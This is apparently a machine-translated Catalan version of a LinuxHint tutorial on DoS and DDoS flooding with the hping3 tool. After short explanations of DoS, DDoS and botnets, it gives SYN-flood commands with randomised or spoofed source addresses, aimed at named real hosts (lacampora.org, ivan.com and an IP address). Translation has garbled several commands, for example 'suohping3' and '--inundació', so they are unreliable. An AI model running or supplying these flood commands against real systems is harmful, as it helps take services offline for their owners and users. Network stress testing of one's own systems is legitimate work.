hping3 ddos ​​d'inundació

Hping3 Flood Ddos



Aquest tutorial se centra en els atacs DDOS (denegació de servei distribuïda) mitjançant l'eina hping3. Si ja esteu familiaritzats amb els atacs DOS (Denial of Service) i DDOS, podeu continuar llegint des de les instruccions pràctiques de hping3; en cas contrari, es recomana conèixer com funcionen aquests atacs.

Atacs DOS


L’atac de denegació de servei (DOS) és una tècnica molt simple per negar l’accessibilitat als serveis (per això s’anomena atac de denegació de servei). Aquest atac consisteix a sobrecarregar l'objectiu amb paquets de grans dimensions, o una gran quantitat d'ells.







Tot i que aquest atac és molt fàcil d’executar, no compromet la informació ni la privadesa de l’objectiu, no és un atac penetrant i només pretén evitar l’accés a l’objectiu.
En enviar una quantitat de paquets, l'objectiu no pot gestionar els atacants perquè el servidor pugui atendre usuaris legítims.



Els atacs DOS es duen a terme des d’un sol dispositiu, per tant, és fàcil aturar-los bloquejant la IP de l’atacant, tot i que l’atacant pot canviar i fins i tot falsificar (clonar) l’adreça IP objectiu, però no és difícil per als tallafocs fer front a aquests atacs. , al contrari del que passa amb els atacs DDOS.



Atacs DDOS

Un atac de denegació de servei distribuït (DDOS) és similar a un atac DOS, però realitzat des de diferents nodes (o diferents atacants) simultàniament. Normalment els atacs DDOS els porten a terme botnets. Les botnets són scripts o programes automatitzats que infecten els ordinadors per dur a terme una tasca automatitzada (en aquest cas un atac DDOS). Un pirata informàtic pot crear una xarxa de bot i infectar molts ordinadors des dels quals botnets llançaran atacs DOS, el fet que moltes botnets estiguin disparant simultàniament converteixen l’atac DOS en un atac DDOS (per això s’anomena distribuït).





Per descomptat, hi ha excepcions en què els atacs DDOS van ser realitzats per atacants humans reals, per exemple, el grup de pirates informàtics Anonymous integrat per milers de persones a tot el món va utilitzar aquesta tècnica amb molta freqüència a causa de la seva fàcil implementació (només requeria voluntaris que compartissin la seva causa), per exemple, com Anonymous va deixar el govern libi de Gaddafi completament desconnectat durant la invasió, l'estat libi va quedar indefens davant de milers d'atacants de tot el món.

Aquest tipus d’atacs, quan es duen a terme des de molts nodes diferents, són extremadament difícils de prevenir i aturar i normalment requereixen un maquinari especial per tractar-lo, ja que els tallafocs i les aplicacions defensives no estan preparats per tractar simultàniament amb milers d’atacants. Aquest no és el cas de hping3, la majoria dels atacs realitzats mitjançant aquesta eina seran bloquejats per dispositius defensius o programari, però és útil a les xarxes locals o contra objectius mal protegits.



Quant a hping3

L'eina hping3 us permet enviar paquets manipulats. Aquesta eina us permet controlar la mida, la quantitat i la fragmentació dels paquets per tal de sobrecarregar l'objectiu i evitar o atacar els tallafocs. Hping3 pot ser útil per fer proves de seguretat o de capacitat, amb ell podeu provar l'eficàcia dels tallafocs i si un servidor pot gestionar una gran quantitat de paquets. A continuació trobareu instruccions sobre com utilitzar hping3 per a proves de seguretat.

Introducció als atacs DDOS mitjançant hping3:

A les distribucions de Debian i Linux basades, podeu instal·lar hping3 executant:

#apteinstal·larhping3-i

Un simple atac DOS (no DDOS) seria:

#suohping3-S --inundació -V -p 80170.155.9.185

On:
sudo: proporciona els privilegis necessaris per executar hping3.
hping3:
crida al programa hping3.
-S: especifica els paquets SYN.
–Inundació: disparar a discreció, les respostes seran ignorades (per això no es mostraran les respostes) i els paquets s’enviaran el més ràpid possible.
-V: Verbositat.
-p 80: port 80, podeu substituir aquest número pel servei al qual vulgueu atacar.
170.155.9.185: IP objectiu.

Inundació mitjançant paquets SYN contra el port 80:

L'exemple següent retrata un atac SYN contra lacampora.org:

#suohping3 lacampora.org-q -n -d 120 -S -p 80 --inundació --rand-source

On:
Lacampora.org: és l'objectiu
-q: sortida breu
-n: mostra la IP de destinació en lloc de l'amfitrió.
-d 120: defineix la mida del paquet
–Rand-source: amaga l'adreça IP.

L'exemple següent mostra un altre exemple possible d'inundació:

Inundació SYN contra el port 80:

#suohping3--rand-sourceivan.com-S -q -p 80 --inundació

Amb hping3 també podeu atacar els vostres objectius amb una adreça IP falsa, per tal d’evitar un tallafoc, fins i tot podeu clonar la vostra adreça d’identificació pròpia o qualsevol adreça permesa que pugueu conèixer (podeu aconseguir-ho per exemple amb Nmap o un sniffer per escoltar establert) connexions).

La sintaxi seria:

#suohping3-a <IP FALS> <objectiu> -S -q -p 80 --més ràpid -c2

En aquest exemple pràctic, l'atac semblaria:

#suohping3-a190.0.175.100 190.0.175.100-S -q -p 80 --més ràpid -c2

Espero que us hagi estat útil aquest tutorial sobre hping3. Seguiu seguint LinuxHint per obtenir més consells i actualitzacions sobre Linux i xarxes.